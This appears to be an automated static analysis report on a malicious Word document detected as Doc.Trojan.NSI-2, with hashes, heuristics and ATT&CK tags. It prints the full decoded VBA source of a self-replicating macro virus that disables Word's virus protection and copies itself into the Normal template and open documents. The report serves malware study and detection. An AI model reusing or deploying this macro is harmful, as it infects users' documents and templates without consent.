Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f77760517e707148…

MALICIOUS

Office (OLE)

29.0 KB Created: 2001-04-03 17:40:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: d8ffb40cfbd083e2dc997890321a7177 SHA-1: 54e401baf482e8e868729cefafddf7811d08368c SHA-256: f77760517e7071488ee97927142248d437f8a6a80ac7a40d21655198b2b96be3
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.NSI-2. It contains VBA macros, specifically a Document_Open macro, which is designed to execute automatically when the document is opened. The macro attempts to modify the document's code and save it, suggesting an attempt to embed malicious content or establish persistence.

Heuristics 3

  • ClamAV: Doc.Trojan.NSI-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.NSI-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1440 bytes
SHA-256: e079b95266a0e0d5660d16f0a2fb01e412fa87972179334ebea88a335adb5ab2
Detection
ClamAV: Doc.Trojan.NSI-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True




Private Sub Document_Close()

End Sub

Private Sub Document_Open()
    On Error Resume Next
    Options.VirusProtection = False
    EnableCancelKey = wdCancelDisabled
    Set maci = MacroContainer.VBProject.VBComponents.Item(1)
    Set macic = maci.CodeModule
    ns$ = Left(macic.lines(1, 1), 21)
    Set inf = NormalTemplate: nsi$ = ns$
        If MacroContainer = inf Then Set inf = ActiveDocument: nsi$ = ns$
    Set infc = inf.VBProject.VBComponents
    Set infi = infc.Item(1)
    Set infic = infi.CodeModule
    infi.Name = "ThisDocument"
    For mx = 2 To infc.Count
        infc.Remove infc.Item(2)
    Next mx
        If infic.countlines <> macic.CountOfLines Then
            infic.deletelines 1, infic.CountOfLines
            For coco = 1 To macic.CountOfLines
                infic.insertlines coco, macic.lines(coco, 1)
            Next coco
            infic.replaceline 1, nsi$
        End If
    If Left(ActiveDocument.Name, 8) <> Mid$(macic.lines(1, 1), 13, 8) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
    EnableCancelKey = wdCancelDisabled
End Sub
'ThisDocument v 1.0 1999